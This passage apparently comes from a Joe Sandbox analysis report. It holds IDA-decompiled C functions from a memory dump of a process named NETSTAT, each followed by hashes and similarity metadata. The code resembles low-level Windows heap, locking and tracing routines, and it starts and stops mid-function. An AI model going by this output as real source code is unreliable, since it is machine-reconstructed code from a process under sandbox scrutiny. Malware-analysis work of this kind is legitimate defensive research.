                                      						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                      						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                      						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                      						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                      						_v108 =  &_v84;
                                      						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                      						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                      						_v76 =  &_v156;
                                      						_t70 = 8;
                                      						_v60 =  &_v144;
                                      						_t67 = 4;
                                      						_v44 =  &_v148;
                                      						_v152 = 0;
                                      						_v160 = 0;
                                      						_v104 = 0;
                                      						_v100 = 2;
                                      						_v96 = 0;
                                      						_v88 = 0;
                                      						_v80 = 0;
                                      						_v72 = 0;
                                      						_v68 = _t70;
                                      						_v64 = 0;
                                      						_v56 = 0;
                                      						_v52 = 0x2f553e8;
                                      						_v48 = 0;
                                      						_v40 = 0;
                                      						_v36 = 0x2f553e8;
                                      						_v32 = 0;
                                      						_v28 =  &_v164;
                                      						_v24 = 0;
                                      						_v20 = _t70;
                                      						_v16 = 0;
                                      						_t69 = 0x2e4bc46;
                                      						_t48 = E02EE7B9C(0x2f553e8, 0x2e4bc46, _t67, 0x2f553e8, _t70,  &_v140);
                                      					}
                                      				}
                                      				return E02EAB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • Opcode ID: 5cd0b8b3e1f59442c34ff306535f9e11826e3ab4bb25ab8e43f96401f4eea3d0
                                      • Instruction ID: c0e9d42c09803c0f9ccef473ae7dae4efe6d169a195ac2a6087d860b985b1443
                                      • Opcode Fuzzy Hash: 5cd0b8b3e1f59442c34ff306535f9e11826e3ab4bb25ab8e43f96401f4eea3d0
                                      • Instruction Fuzzy Hash: 9E41A4B1D4032C9EDB14CF9AD981AAEFBF5FB48314F5081AEE519A7240E7705A84CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			E02E9E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                      				intOrPtr* _v0;
                                      				signed char _v4;
                                      				signed int _v8;
                                      				void* __ecx;
                                      				void* __ebp;
                                      				void* _t37;
                                      				intOrPtr _t38;
                                      				signed int _t44;
                                      				signed char _t52;
                                      				void* _t54;
                                      				intOrPtr* _t56;
                                      				void* _t58;
                                      				char* _t59;
                                      				signed int _t62;
                                      
                                      				_t58 = __edx;
                                      				_push(0);
                                      				_push(4);
                                      				_push( &_v8);
                                      				_push(0x24);
                                      				_push(0xffffffff);
                                      				if(E02EA9670() < 0) {
                                      					L02EBDF30(_t54, _t58, _t35);
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					asm("int3");
                                      					_push(_t54);
                                      					_t52 = _v4;
                                      					if(_t52 > 8) {
                                      						_t37 = 0xc0000078;
                                      					} else {
                                      						_t38 =  *0x2f57b9c; // 0x0
                                      						_t62 = _t52 & 0x000000ff;
                                      						_t59 = L02E84620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                      						if(_t59 == 0) {
                                      							_t37 = 0xc0000017;
                                      						} else {
                                      							_t56 = _v0;
                                      							 *(_t59 + 1) = _t52;
                                      							 *_t59 = 1;
                                      							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                      							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                      							_t44 = _t62 - 1;
                                      							if(_t44 <= 7) {
                                      								switch( *((intOrPtr*)(_t44 * 4 +  &M02E9E810))) {
                                      									case 0:
                                      										L6:
                                      										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                      										goto L7;
                                      									case 1:
                                      										L13:
                                      										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                      										goto L6;
                                      									case 2:
                                      										L12:
                                      										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                      										goto L13;
                                      									case 3:
                                      										L11:
                                      										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                      										goto L12;
                                      									case 4:
                                      										L10:
                                      										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                      										goto L11;
                                      									case 5:
                                      										L9:
                                      										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                      										goto L10;
                                      									case 6:
                                      										L17:
                                      										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                      										goto L9;
                                      									case 7:
                                      										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                      										goto L17;
                                      								}
                                      							}
                                      							L7:
                                      							 *_a40 = _t59;
                                      							_t37 = 0;
                                      						}
                                      					}
                                      					return _t37;
                                      				} else {
                                      					_push(0x20);
                                      					asm("ror eax, cl");
                                      					return _a4 ^ _v8;
                                      				}
                                      			}


















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3dc3a25d9e2c41bcb5ca6e37bab5a380309bac3024128ee19131b9bdfbd16c01
                                      • Instruction ID: 0c8299ebf37e63ec020270a9c9b3b045650e44bc838cd2bd2f67796c529bde43
                                      • Opcode Fuzzy Hash: 3dc3a25d9e2c41bcb5ca6e37bab5a380309bac3024128ee19131b9bdfbd16c01
                                      • Instruction Fuzzy Hash: 49318F75A54249EFDB04CF58C840B96B7E4FB09314F18925AFA08CB341E631E890CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E02E9BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				void* __ebx;
                                      				void* __edi;
                                      				intOrPtr _t22;
                                      				intOrPtr* _t41;
                                      				intOrPtr _t51;
                                      
                                      				_t51 =  *0x2f56100; // 0xa
                                      				_v12 = __edx;
                                      				_v8 = __ecx;
                                      				if(_t51 >= 0x800) {
                                      					L12:
                                      					return 0;
                                      				} else {
                                      					goto L1;
                                      				}
                                      				while(1) {
                                      					L1:
                                      					_t22 = _t51;
                                      					asm("lock cmpxchg [ecx], edx");
                                      					if(_t51 == _t22) {
                                      						break;
                                      					}
                                      					_t51 = _t22;
                                      					if(_t22 < 0x800) {
                                      						continue;
                                      					}
                                      					goto L12;
                                      				}
                                      				E02E82280(0xd, 0xecaf1a0);
                                      				_t41 =  *0x2f560f8; // 0x0
                                      				if(_t41 != 0) {
                                      					 *0x2f560f8 =  *_t41;
                                      					 *0x2f560fc =  *0x2f560fc + 0xffff;
                                      				}
                                      				E02E7FFB0(_t41, 0x800, 0xecaf1a0);
                                      				if(_t41 != 0) {
                                      					L6:
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                      					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                      					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                      					do {
                                      						asm("lock xadd [0x2f560f0], ax");
                                      						 *((short*)(_t41 + 0x34)) = 1;
                                      					} while (1 == 0);
                                      					goto L8;
                                      				} else {
                                      					_t41 = L02E84620(0x2f56100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                      					if(_t41 == 0) {
                                      						L11:
                                      						asm("lock dec dword [0x2f56100]");
                                      						L8:
                                      						return _t41;
                                      					}
                                      					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                      					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                      					if(_t41 == 0) {
                                      						goto L11;
                                      					}
                                      					goto L6;
                                      				}
                                      			}











                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1611f148eccbaa22601c06e37fc69d45719f93c905b6bce6928e867f016ce805
                                      • Instruction ID: 854e2d1ec46b07d469e25029a971f9d0e1a2993d444378f9ed4c7ef814f50f1b
                                      • Opcode Fuzzy Hash: 1611f148eccbaa22601c06e37fc69d45719f93c905b6bce6928e867f016ce805
                                      • Instruction Fuzzy Hash: B3312532A806259FCF01DF58E4807A6B3A8FF09319F41947AEE58DB201E774D946CBC0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 76%
                                      			E02E69100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                      				signed int _t53;
                                      				signed int _t56;
                                      				signed int* _t60;
                                      				signed int _t63;
                                      				signed int _t66;
                                      				signed int _t69;
                                      				void* _t70;
                                      				intOrPtr* _t72;
                                      				void* _t78;
                                      				void* _t79;
                                      				signed int _t80;
                                      				intOrPtr _t82;
                                      				void* _t85;
                                      				void* _t88;
                                      				void* _t89;
                                      
                                      				_t84 = __esi;
                                      				_t70 = __ecx;
                                      				_t68 = __ebx;
                                      				_push(0x2c);
                                      				_push(0x2f3f6e8);
                                      				E02EBD0E8(__ebx, __edi, __esi);
                                      				 *((char*)(_t85 - 0x1d)) = 0;
                                      				_t82 =  *((intOrPtr*)(_t85 + 8));
                                      				if(_t82 == 0) {
                                      					L4:
                                      					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                      						E02F388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                      					}
                                      					L5:
                                      					return E02EBD130(_t68, _t82, _t84);
                                      				}
                                      				_t88 = _t82 -  *0x2f586c0; // 0x3f07b0
                                      				if(_t88 == 0) {
                                      					goto L4;
                                      				}
                                      				_t89 = _t82 -  *0x2f586b8; // 0x0
                                      				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                      					goto L4;
                                      				} else {
                                      					E02E82280(_t82 + 0xe0, _t82 + 0xe0);
                                      					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                      					__eflags =  *((char*)(_t82 + 0xe5));
                                      					if(__eflags != 0) {
                                      						E02F388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                      						goto L12;
                                      					} else {
                                      						__eflags =  *((char*)(_t82 + 0xe4));
                                      						if( *((char*)(_t82 + 0xe4)) == 0) {
                                      							 *((char*)(_t82 + 0xe4)) = 1;
                                      							_push(_t82);
                                      							_push( *((intOrPtr*)(_t82 + 0x24)));
                                      							E02EAAFD0();
                                      						}
                                      						while(1) {
                                      							_t60 = _t82 + 8;
                                      							 *(_t85 - 0x2c) = _t60;
                                      							_t68 =  *_t60;
                                      							_t80 = _t60[1];
                                      							 *(_t85 - 0x28) = _t68;
                                      							 *(_t85 - 0x24) = _t80;
                                      							while(1) {
                                      								L10:
                                      								__eflags = _t80;
                                      								if(_t80 == 0) {
                                      									break;
                                      								}
                                      								_t84 = _t68;
                                      								 *(_t85 - 0x30) = _t80;
                                      								 *(_t85 - 0x24) = _t80 - 1;
                                      								asm("lock cmpxchg8b [edi]");
                                      								_t68 = _t84;
                                      								 *(_t85 - 0x28) = _t68;
                                      								 *(_t85 - 0x24) = _t80;
                                      								__eflags = _t68 - _t84;
                                      								_t82 =  *((intOrPtr*)(_t85 + 8));
                                      								if(_t68 != _t84) {
                                      									continue;
                                      								}
                                      								__eflags = _t80 -  *(_t85 - 0x30);
                                      								if(_t80 !=  *(_t85 - 0x30)) {
                                      									continue;
                                      								}
                                      								__eflags = _t80;
                                      								if(_t80 == 0) {
                                      									break;
                                      								}
                                      								_t63 = 0;
                                      								 *(_t85 - 0x34) = 0;
                                      								_t84 = 0;
                                      								__eflags = 0;
                                      								while(1) {
                                      									 *(_t85 - 0x3c) = _t84;
                                      									__eflags = _t84 - 3;
                                      									if(_t84 >= 3) {
                                      										break;
                                      									}
                                      									__eflags = _t63;
                                      									if(_t63 != 0) {
                                      										L40:
                                      										_t84 =  *_t63;
                                      										__eflags = _t84;
                                      										if(_t84 != 0) {
                                      											_t84 =  *(_t84 + 4);
                                      											__eflags = _t84;
                                      											if(_t84 != 0) {
                                      												 *0x2f5b1e0(_t63, _t82);
                                      												 *_t84();
                                      											}
                                      										}
                                      										do {
                                      											_t60 = _t82 + 8;
                                      											 *(_t85 - 0x2c) = _t60;
                                      											_t68 =  *_t60;
                                      											_t80 = _t60[1];
                                      											 *(_t85 - 0x28) = _t68;
                                      											 *(_t85 - 0x24) = _t80;
                                      											goto L10;
                                      										} while (_t63 == 0);
                                      										goto L40;
                                      									}
                                      									_t69 = 0;
                                      									__eflags = 0;
                                      									while(1) {
                                      										 *(_t85 - 0x38) = _t69;
                                      										__eflags = _t69 -  *0x2f584c0;
                                      										if(_t69 >=  *0x2f584c0) {
                                      											break;
                                      										}
                                      										__eflags = _t63;
                                      										if(_t63 != 0) {
                                      											break;
                                      										}
                                      										_t66 = E02F39063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                      										__eflags = _t66;
                                      										if(_t66 == 0) {
                                      											_t63 = 0;
                                      											__eflags = 0;
                                      										} else {
                                      											_t63 = _t66 + 0xfffffff4;
                                      										}
                                      										 *(_t85 - 0x34) = _t63;
                                      										_t69 = _t69 + 1;
                                      									}
                                      									_t84 = _t84 + 1;
                                      								}
                                      								__eflags = _t63;
                                      							}
                                      							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                      							 *((char*)(_t82 + 0xe5)) = 1;
                                      							 *((char*)(_t85 - 0x1d)) = 1;
                                      							L12:
                                      							 *(_t85 - 4) = 0xfffffffe;
                                      							E02E6922A(_t82);
                                      							_t53 = E02E87D50();
                                      							__eflags = _t53;
                                      							if(_t53 != 0) {
                                      								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      							} else {
                                      								_t56 = 0x7ffe0386;
                                      							}
                                      							__eflags =  *_t56;
                                      							if( *_t56 != 0) {
                                      								_t56 = E02F38B58(_t82);
                                      							}
                                      							__eflags =  *((char*)(_t85 - 0x1d));
                                      							if( *((char*)(_t85 - 0x1d)) != 0) {
                                      								__eflags = _t82 -  *0x2f586c0; // 0x3f07b0
                                      								if(__eflags != 0) {
                                      									__eflags = _t82 -  *0x2f586b8; // 0x0
                                      									if(__eflags == 0) {
                                      										_t79 = 0x2f586bc;
                                      										_t72 = 0x2f586b8;
                                      										goto L18;
                                      									}
                                      									__eflags = _t56 | 0xffffffff;
                                      									asm("lock xadd [edi], eax");
                                      									if(__eflags == 0) {
                                      										E02E69240(_t68, _t82, _t82, _t84, __eflags);
                                      									}
                                      								} else {
                                      									_t79 = 0x2f586c4;
                                      									_t72 = 0x2f586c0;
                                      									L18:
                                      									E02E99B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                      								}
                                      							}
                                      							goto L5;
                                      						}
                                      					}
                                      				}
                                      			}



















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f20fe79f5ac1de46c75cfc99b2e5d885603375f09d2b2746e2cb0514d15ce60
                                      • Instruction ID: 066003e57b3c71eb71e149c51ffb643371f3d621e73ab38e8b9d2aa034197312
                                      • Opcode Fuzzy Hash: 2f20fe79f5ac1de46c75cfc99b2e5d885603375f09d2b2746e2cb0514d15ce60
                                      • Instruction Fuzzy Hash: DF31A075AC1245DFDB21DB68C58CBADB7F2BB483D8F25E15AD50867242C334A980CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 60%
                                      			E02E91DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                      				char _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr* _v20;
                                      				void* _t22;
                                      				char _t23;
                                      				void* _t36;
                                      				intOrPtr _t42;
                                      				intOrPtr _t43;
                                      
                                      				_v12 = __ecx;
                                      				_t43 = 0;
                                      				_v20 = __edx;
                                      				_t42 =  *__edx;
                                      				 *__edx = 0;
                                      				_v16 = _t42;
                                      				_push( &_v8);
                                      				_push(0);
                                      				_push(0);
                                      				_push(6);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                      				_push(_t36);
                                      				_t22 = E02E8F460();
                                      				if(_t22 < 0) {
                                      					if(_t22 == 0xc0000023) {
                                      						goto L1;
                                      					}
                                      					L3:
                                      					return _t43;
                                      				}
                                      				L1:
                                      				_t23 = _v8;
                                      				if(_t23 != 0) {
                                      					_t38 = _a4;
                                      					if(_t23 >  *_a4) {
                                      						_t42 = L02E84620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                      						if(_t42 == 0) {
                                      							goto L3;
                                      						}
                                      						_t23 = _v8;
                                      					}
                                      					_push( &_v8);
                                      					_push(_t23);
                                      					_push(_t42);
                                      					_push(6);
                                      					_push(_t43);
                                      					_push(_v12);
                                      					_push(_t36);
                                      					if(E02E8F460() < 0) {
                                      						if(_t42 != 0 && _t42 != _v16) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                      						}
                                      						goto L3;
                                      					}
                                      					 *_v20 = _t42;
                                      					 *_a4 = _v8;
                                      				}
                                      				_t43 = 1;
                                      				goto L3;
                                      			}













                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction ID: 17771241b81c760866413b2817c79a375c2fe1b09491fd16cfab608813099727
                                      • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                      • Instruction Fuzzy Hash: 9121837168011AEFDB21DF59CD80EABBBBDEF85644F11905AF9099B210D774AD01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 53%
                                      			E02E80050(void* __ecx) {
                                      				signed int _v8;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr* _t30;
                                      				intOrPtr* _t31;
                                      				signed int _t34;
                                      				void* _t40;
                                      				void* _t41;
                                      				signed int _t44;
                                      				intOrPtr _t47;
                                      				signed int _t58;
                                      				void* _t59;
                                      				void* _t61;
                                      				void* _t62;
                                      				signed int _t64;
                                      
                                      				_push(__ecx);
                                      				_v8 =  *0x2f5d360 ^ _t64;
                                      				_t61 = __ecx;
                                      				_t2 = _t61 + 0x20; // 0x20
                                      				E02E99ED0(_t2, 1, 0);
                                      				_t52 =  *(_t61 + 0x8c);
                                      				_t4 = _t61 + 0x8c; // 0x8c
                                      				_t40 = _t4;
                                      				do {
                                      					_t44 = _t52;
                                      					_t58 = _t52 & 0x00000001;
                                      					_t24 = _t44;
                                      					asm("lock cmpxchg [ebx], edx");
                                      					_t52 = _t44;
                                      				} while (_t52 != _t44);
                                      				if(_t58 == 0) {
                                      					L7:
                                      					_pop(_t59);
                                      					_pop(_t62);
                                      					_pop(_t41);
                                      					return E02EAB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                      				}
                                      				asm("lock xadd [esi], eax");
                                      				_t47 =  *[fs:0x18];
                                      				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                      				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                      				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                      				if(_t30 != 0) {
                                      					if( *_t30 == 0) {
                                      						goto L4;
                                      					}
                                      					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      					L5:
                                      					if( *_t31 != 0) {
                                      						_t18 = _t61 + 0x78; // 0x78
                                      						E02F38A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                      					}
                                      					_t52 =  *(_t61 + 0x5c);
                                      					_t11 = _t61 + 0x78; // 0x78
                                      					_t34 = E02E99702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                      					_t24 = _t34 | 0xffffffff;
                                      					asm("lock xadd [esi], eax");
                                      					if((_t34 | 0xffffffff) == 0) {
                                      						 *0x2f5b1e0(_t61);
                                      						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                      					}
                                      					goto L7;
                                      				}
                                      				L4:
                                      				_t31 = 0x7ffe0386;
                                      				goto L5;
                                      			}





















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f68f09847c988e751755fd212d0c789eeb12bd177c90c1a28c07388249652beb
                                      • Instruction ID: 80c23f0d163a4eadb63a65ddb1bbb3c7533e71b77f73f16b54ef21f125a5de6d
                                      • Opcode Fuzzy Hash: f68f09847c988e751755fd212d0c789eeb12bd177c90c1a28c07388249652beb
                                      • Instruction Fuzzy Hash: E4318F31641B04CFD722DF28C940B96B3E5FF88718F24996DE59A87790DB75A805CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E02EE6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                      				signed short* _v8;
                                      				signed char _v12;
                                      				void* _t22;
                                      				signed char* _t23;
                                      				intOrPtr _t24;
                                      				signed short* _t44;
                                      				void* _t47;
                                      				signed char* _t56;
                                      				signed char* _t58;
                                      
                                      				_t48 = __ecx;
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t44 = __ecx;
                                      				_v12 = __edx;
                                      				_v8 = __ecx;
                                      				_t22 = E02E87D50();
                                      				_t58 = 0x7ffe0384;
                                      				if(_t22 == 0) {
                                      					_t23 = 0x7ffe0384;
                                      				} else {
                                      					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      				}
                                      				if( *_t23 != 0) {
                                      					_t24 =  *0x2f57b9c; // 0x0
                                      					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                      					_t23 = L02E84620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                      					_t56 = _t23;
                                      					if(_t56 != 0) {
                                      						_t56[0x24] = _a4;
                                      						_t56[0x28] = _a8;
                                      						_t56[6] = 0x1420;
                                      						_t56[0x20] = _v12;
                                      						_t14 =  &(_t56[0x2c]); // 0x2c
                                      						E02EAF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                      						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                      						if(E02E87D50() != 0) {
                                      							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      						}
                                      						_push(_t56);
                                      						_push(_t47 - 0x20);
                                      						_push(0x402);
                                      						_push( *_t58 & 0x000000ff);
                                      						E02EA9AE0();
                                      						_t23 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                      					}
                                      				}
                                      				return _t23;
                                      			}













                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E02EA90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                      				intOrPtr* _v0;
                                      				void* _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				char _v36;
                                      				void* _t38;
                                      				intOrPtr _t41;
                                      				void* _t44;
                                      				signed int _t45;
                                      				intOrPtr* _t49;
                                      				signed int _t57;
                                      				signed int _t58;
                                      				intOrPtr* _t59;
                                      				void* _t62;
                                      				void* _t63;
                                      				void* _t65;
                                      				void* _t66;
                                      				signed int _t69;
                                      				intOrPtr* _t70;
                                      				void* _t71;
                                      				intOrPtr* _t72;
                                      				intOrPtr* _t73;
                                      				char _t74;
                                      
                                      				_t65 = __edx;
                                      				_t57 = _a4;
                                      				_t32 = __ecx;
                                      				_v8 = __edx;
                                      				_t3 = _t32 + 0x14c; // 0x14c
                                      				_t70 = _t3;
                                      				_v16 = __ecx;
                                      				_t72 =  *_t70;
                                      				while(_t72 != _t70) {
                                      					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                      						L24:
                                      						_t72 =  *_t72;
                                      						continue;
                                      					}
                                      					_t30 = _t72 + 0x10; // 0x10
                                      					if(E02EBD4F0(_t30, _t65, _t57) == _t57) {
                                      						return 0xb7;
                                      					}
                                      					_t65 = _v8;
                                      					goto L24;
                                      				}
                                      				_t61 = _t57;
                                      				_push( &_v12);
                                      				_t66 = 0x10;
                                      				if(E02E9E5E0(_t57, _t66) < 0) {
                                      					return 0x216;
                                      				}
                                      				_t73 = L02E84620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                      				if(_t73 == 0) {
                                      					_t38 = 0xe;
                                      					return _t38;
                                      				}
                                      				_t9 = _t73 + 0x10; // 0x10
                                      				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                      				E02EAF3E0(_t9, _v8, _t57);
                                      				_t41 =  *_t70;
                                      				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                      					_t62 = 3;
                                      					asm("int 0x29");
                                      					_push(_t62);
                                      					_push(_t57);
                                      					_push(_t73);
                                      					_push(_t70);
                                      					_t71 = _t62;
                                      					_t74 = 0;
                                      					_v36 = 0;
                                      					_t63 = E02E9A2F0(_t62, _t71, 1, 6,  &_v36);
                                      					if(_t63 == 0) {
                                      						L20:
                                      						_t44 = 0x57;
                                      						return _t44;
                                      					}
                                      					_t45 = _v12;
                                      					_t58 = 0x1c;
                                      					if(_t45 < _t58) {
                                      						goto L20;
                                      					}
                                      					_t69 = _t45 / _t58;
                                      					if(_t69 == 0) {
                                      						L19:
                                      						return 0xe8;
                                      					}
                                      					_t59 = _v0;
                                      					do {
                                      						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                      							goto L18;
                                      						}
                                      						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                      						 *_t59 = _t49;
                                      						if( *_t49 != 0x53445352) {
                                      							goto L18;
                                      						}
                                      						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                      						return 0;
                                      						L18:
                                      						_t63 = _t63 + 0x1c;
                                      						_t74 = _t74 + 1;
                                      					} while (_t74 < _t69);
                                      					goto L19;
                                      				}
                                      				 *_t73 = _t41;
                                      				 *((intOrPtr*)(_t73 + 4)) = _t70;
